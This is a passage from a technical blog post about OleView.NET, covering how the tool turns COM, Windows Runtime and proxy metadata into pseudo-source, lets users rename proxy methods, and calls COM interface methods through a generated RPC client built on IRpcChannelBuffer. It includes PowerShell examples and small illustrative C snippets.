    Note that we also need to pass a -Parse option to the command. Some metadata, such as type libraries and proxies, can be expensive to parse, so the tool won't do that automatically. However, once they've been parsed in the current session, the metadata is cached for further use - so, for example, if you format a single interface in a type library, all other interfaces in that library are also parsed and can be formatted.

    The output of this command is the converted "source code" as text. The format depends on the metadata source. For example, the following is the output from a Windows Runtime type:

    [Guid("155eb23b-242a-45e0-a2e9-3171fc6a7fdd")]

    interface IUserStatics

    {

        /* Methods */

        UserWatcher CreateWatcher();

        IAsyncOperation<IReadOnlyList<User>> FindAllAsync();

        IAsyncOperation<IReadOnlyList<User>> FindAllAsync(UserType type);

        IAsyncOperation<IReadOnlyList<User>> FindAllAsync(UserType type, 

                                           UserAuthenticationStatus status);

        User GetFromId(string nonRoamableId);

    }

    As Windows Runtime types are defined using metadata similar to .NET, the output is a pseudo-C# format. In contrast, the output for a type library or proxy looks more like the following:

    [

        odl,

        uuid(00000512-0000-0010-8000-00AA006D2EA4),

        dual,

        oleautomation,

        nonextensible

    ]

    interface _Collection : IDispatch {

        [id(1), propget]

        HRESULT Count([out, retval] int* c);

        [id(0xFFFFFFFC), restricted]

        HRESULT _NewEnum([out, retval] IUnknown** ppvObject);

        [id(2)]

        HRESULT Refresh();

    };

    This is in the Microsoft Interface Definition Language (MIDL) format. The type library version should be pretty accurate and could even be recompiled by the MIDL compiler. For proxies, some of the information is lost, so the generated MIDL isn't completely accurate, but as we'll see later there's limited reason to take the output and recompile.

    Another thing to note is that proxies lose name information when compiled from MIDL to their C marshaled representation. Therefore the tool just generates placeholder names, for example, method names are of the form "ProcN". If the proxy is for a type that has a known definition, such as from a Windows Runtime type or a type library then the tool will try and automatically apply the names. If not, you'll need to manually change them if you want them to be anything other than the default.

    You can change the names from PowerShell by modifying the proxy object directly. For example the "IBitsTest1" interface looks like the following before doing anything:

    [

      object,

      uuid(51A183DB-67E0-4472-8602-3DBC730B7EF5),

    ]

    interface IBitsTest1 : IUnknown {

        HRESULT Proc3([out, string] wchar_t** p0);

    }

    You can modify "Proc3" with the following script:

    PS> $proxy = Get-ComProxy -Iid 51A183DB-67E0-4472-8602-3DBC730B7EF5

    PS> $proxy.Procedures[0].Name = "GetBitsDllPath"

    PS> $proxy.Procedures[0].Parameters[0].Name = "DllPath"

    Now the formatted output looks like the following:

    [

      object,

      uuid(51A183DB-67E0-4472-8602-3DBC730B7EF5),

    ]

    interface IBitsTest1 : IUnknown {

        HRESULT GetBitsDllPath([out, string] wchar_t** DllPath);

    }

    This renaming will also be important when we come back to calling proxied methods. Obviously it'd be annoying to run this script every time, so you can cache the names using the following command:

    PS> Export-ComProxyName -Proxy $proxy -ToCache

    This will write out a file describing the names to a local cache file. When the proxy is loaded again in another session this cache file will be automatically applied. The Export-ComProxyName and corresponding Import-ComProxyName commands allow you to read and write XML or JSON files representing the proxy names which you can modify in a text editor if that's easier.

    One of the quickest wins is to enumerate the interfaces for a COM object, then pass the output of that through the ConvertTo-ComSourceCode command. For example:

    PS> $obj = New-ComObject -Clsid 4575438f-a6c8-4976-b0fe-2f26b80d959e

    PS> Get-ComInterface -Object $obj | ConvertTo-ComSourceCode -Parse

    This creates a new COM object based on its CLSID, enumerates the interfaces it supports and then passes them through the conversion process to get out a "source code" representation of the interfaces.

    To view the source code in the GUI you first need to open one of the database views from the Registry menu. In the resulting window, there will be a tree view of artifacts. You need to open the source code viewer window by right clicking the tree and selecting the Show Source Code option in the context menu. This will result in a view similar to the following:

    Screenshot showing the tooling, with the resulting window as described in the paragraph above

    You can also automatically enable the source code view from the View→Registry View Options menu. In that menu you can also enable automatically parsing the interface information, which is off by default.

    You might notice in the screenshot that there's some text which is underlined. This indicates names which can be changed, and it is only used for proxies. You can right click the name and choose Edit Name from the context menu to bring up a text entry dialog. You can then change the name to suit. If you want to persist the names between sessions then set the Save Proxy Names on Exit option in the registry view options. Then when you exit any modified proxies will be written to the cache.

    If you want to edit a proxy from PowerShell in a similar GUI you can use following command:

    PS> Edit-ComSourceCode $proxy

    This will show a dialog similar to the following where you can do edits to the proxy name information:

    Screenshot showing where you can do edits to the proxy name

    Generating Interfaces from a Proxy Definition

    Now on to the more important side of these updates, the ability to invoke methods on the interfaces exposed by an object you want to research. The tool has always given you some ability to invoke methods as long as the object has a .NET interface to call through reflection. This could either be through a known interface type, such as a built-in one or the Windows Runtime interfaces or by converting a type library into a .NET assembly on demand.

    What's new is the ability to generate an interface based on a proxy definition and then use that to invoke methods. Initially I tried to implement this by generating an .NET interface dynamically which would then use the existing .NET interop to call the proxy methods. This worked fine for simple proxies but quickly hit problems when doing anything more complex:

    • Some types are hard to represent in easy to use .NET types, such as pointers to structures. This is "handled" in the type library converter by just exporting them as IntPtr parameters which means the caller has to manually marshal the data. Get this wrong and the tool crashes.
    • Any structures need to be accurately laid out so the native marshaler can read and write to the correct field locations. Get this wrong and the tool crashes.
    • Did I mention that if you get this wrong the tool crashes?
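
    To make the layout hazard concrete, here's a small illustration (my own sketch, not code from the tool) of how a single misdeclared field shifts every subsequent offset. A native marshaler handed the wrong layout reads and writes the wrong memory locations, which in-process generally means a crash:

    ```c
    #include <stdio.h>
    #include <stddef.h>
    #include <stdint.h>

    /* The layout the native marshaling code actually expects: on common
       64-bit ABIs the 8-byte field forces 4 bytes of padding after id. */
    struct Native {
        uint32_t id;
        uint64_t value;
    };

    /* A plausible but wrong reconstruction, declaring value as 32-bit:
       no padding, so value lands at a different offset entirely. */
    struct Wrong {
        uint32_t id;
        uint32_t value;
    };

    int main(void) {
        printf("expected offset of value: %zu\n", offsetof(struct Native, value));
        printf("wrong    offset of value: %zu\n", offsetof(struct Wrong, value));
        return 0;
    }
    ```

    On a typical 64-bit ABI the offsets are 8 versus 4, so every field after the mistake is read from the wrong place.
    
    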

    Fortunately I already had a solution: my sandbox library already had the ability to dynamically generate a .NET class from parsed NDR data. In fact I was already using the library to parse the NDR data for proxies, so I realized I could repurpose the existing client builder for COM proxy clients. I needed to do some simple refactoring of the code to make it build from a COM proxy instance rather than an RPC server, but I quickly had an RPC client. This RPC client doesn't directly interact with any native marshaling code, so it's unlikely to crash. Also, any complex structures are built in a way which makes them easy to modify from .NET, removing the problems around pointers. One issue with the RPC client approach is that the same interface could be used for both in-process and out-of-process objects. Due to the way COM is designed a client usually doesn't need to care about where the object is, but in this case it must be accessible via a proxy. This isn't that big an issue; there's no security boundary between in-process COM objects, and so being able to call methods on them isn't that interesting.

    The next problem was the RPC transport. COM calls have an additional input and output parameter, the ORPCTHIS and ORPCTHAT structures, that need to be added to the call. These parameters could have been added to the RPC client, but it seemed best to keep the clients agnostic of the transport. Instead, as my RPC code has pluggable transports, I was able to implement a custom version on top of the existing ALPC and TCP transports which added the additional parameters to any call. That wasn't the end of it though: ALPC needs an additional pair of parameters, LocalThis and LocalThat, which potentially differ between versions of Windows. You also need to add support for additional services, such as the OXID resolver and communication with the local DCOM activator. While I implemented all of this, it wasn't as reliable as I'd like; however, it's still present in the source code if you want to play with it.

    As an aside, I should point out that Clement Rouault, one of the original researchers into the ALPC RPC protocol, whose work inspired parts of my own implementation, recently released a very similar project for their Python tooling which implements the ALPC DCOM protocol.

    I decided that I'd need a different approach. In the COM runtime, the RPC channel used by a proxy instance is represented by the IRpcChannelBuffer interface. An object implementing this interface is connected to the proxy during initialization; it is then used to send and receive NDR-formatted data between the client and the server. The implementation handles all the idiosyncrasies, such as the additional parameters, OXID resolving and reference counting. If we could get hold of a proxy object's instance of the IRpcChannelBuffer object, we could use that instead of implementing our own protocol; the challenge was how to get it.
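
    The documented shape of IRpcChannelBuffer helps explain why capturing it is so useful: everything needed to transmit a marshaled call sits behind its SendReceive method. The following is a minimal, portable sketch of the vtable layout (mirroring the declaration order in objidl.h, with Windows types replaced by stand-ins so it compiles anywhere); it isn't usable against real COM, it just shows which slots end up being dispatched:

    ```c
    #include <stdio.h>
    #include <stddef.h>

    /* Stand-ins for Windows types, purely for illustration; in a real
       build these definitions come from objidl.h. */
    typedef long HRESULT;
    typedef unsigned long ULONG;
    typedef struct RPCOLEMESSAGE RPCOLEMESSAGE; /* opaque here */
    typedef struct GUID GUID;                   /* opaque here */

    /* Mirror of the IRpcChannelBuffer vtable: three IUnknown slots
       followed by the five channel methods, in declaration order. */
    typedef struct IRpcChannelBufferVtbl {
        HRESULT (*QueryInterface)(void *self, const GUID *riid, void **ppv);
        ULONG   (*AddRef)(void *self);
        ULONG   (*Release)(void *self);
        HRESULT (*GetBuffer)(void *self, RPCOLEMESSAGE *msg, const GUID *riid);
        HRESULT (*SendReceive)(void *self, RPCOLEMESSAGE *msg, ULONG *status);
        HRESULT (*FreeBuffer)(void *self, RPCOLEMESSAGE *msg);
        HRESULT (*GetDestCtx)(void *self, unsigned long *ctx, void **pctx);
        HRESULT (*IsConnected)(void *self);
    } IRpcChannelBufferVtbl;

    int main(void) {
        /* SendReceive, the method that actually transmits the NDR buffer,
           sits after the three IUnknown methods and GetBuffer. */
        printf("SendReceive slot: %zu\n",
               offsetof(IRpcChannelBufferVtbl, SendReceive) / sizeof(void *));
        return 0;
    }
    ```

    A client that owns the buffer fills an RPCOLEMESSAGE via GetBuffer, calls SendReceive, and reads the unmarshaled results back, which is exactly the path the tool drives through native delegates.
    
    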

    After a bit of research I found that we can use the documented NdrProxyInitialize function to get hold of the interface from its MIDL_STUB_MESSAGE structure by passing in the interface pointer to a proxy. While it wouldn't be as flexible as a fully custom implementation this gave me an easy way to handle the transport without worrying about platform or protocol differences. It could also work from an existing COM object, just query the appropriate interface, extract the buffer and make calls to the remote server.

    Of course nothing is that simple. I discovered that while the IRpcChannelBuffer object is a COM object, it has a broken implementation of IMarshal. As .NET's COM interop tries to query for IMarshal when generating a Runtime Callable Wrapper, it will immediately crash the process. I had to manually dispatch calls to the interface's methods through native delegates, but at least it works.

    Calling Interface Methods

    Okay, so how do you use the tool to call arbitrary methods? For the GUI it works like it always has: when you create an instance of a COM object, usually by right clicking an entry in a view and selecting Create Instance, you'll get a new object information window similar to the following:

    Screenshot showing what happens when you right-click on an entry in a view and select create instance

    At the bottom of the window is a list of supported interfaces. The right column indicates whether there's a viewer for that interface. If it's set to Yes, then you can double click it to bring up an invocation window like the following:

    Screenshot of the OleView .NET tooling showing the invoked method

    From this window you can double click a method to bring up a new dialog where you can specify the arguments and invoke the method as shown below.

    Screenshot of Invoke GetBitsDllPath showing that the operation completed successfully

    Once invoked, it'll show the resulting output parameters and, if the return value is an integer, will assume it's an HRESULT error code. These windows are the same for "reflected" interfaces, such as type libraries and Windows Runtime interfaces, as well as proxy clients. The names of proxy methods won't be automatically updated if you change them while the interface window is open. You'll need to go back to the object information window and double click the interface again to get it to recreate the client.

    For PowerShell you can specify an Iid argument when using the New-ComObject command or use the Get-ComObjectInterface command to query an existing COM object for a new interface. The tooling will pick the best option for calling the interface from the options available to it, including generating the RPC client dynamically.

    PS> $obj = New-ComObject -Clsid 4991D34B-80A1-4291-83B6-3328366B9097

    PS> $test = Get-ComObjectInterface $obj -Iid 51A183DB-67E0-4472-8602-3DBC730B7EF5

    PS> $test.GetBitsDllPath()

    DllPath                      retval

    -------                      ------

    c:\windows\system32\qmgr.dll      0

    To make it easier to call interface methods from PowerShell, the exposed methods on the object are modified to wrap output parameters in a single return value. You can see this in the listing above: the DllPath parameter was originally an output-only parameter. Rather than deal with that in the script, a return structure was automatically created containing the DllPath as well as the HRESULT return value. If a parameter is both an input and an output then the method signature accepts the input value and the return value contains the output value.

    If the definitions for your interface don't already exist, you can import them into the tool to be used by the automatic interface selection. To do this you'll need to define the interfaces as .NET types and compile them into an assembly. Then in the GUI use the File→Import Interop Assembly menu option, or for PowerShell use the Add-ComObjectInterface command. Both of these options allow you to specify that the assembly will be automatically loaded the next time you start the tool. This makes a copy of the DLL in a central location so that it can be accessed even if you delete the original library later.

    If all you have is an IDL file for a set of COM interfaces, you can import them into the tool indirectly with help from the Windows SDK. First compile the IDL file using the MIDL compiler to generate a type library, then use the TLBIMP command to generate an assembly from the type library. Finally, you can import it using the previous paragraph's methods.

    There's plenty to discover in OleView.NET which I've not covered here. I'd encourage you to play around, or check out the source code on GitHub.
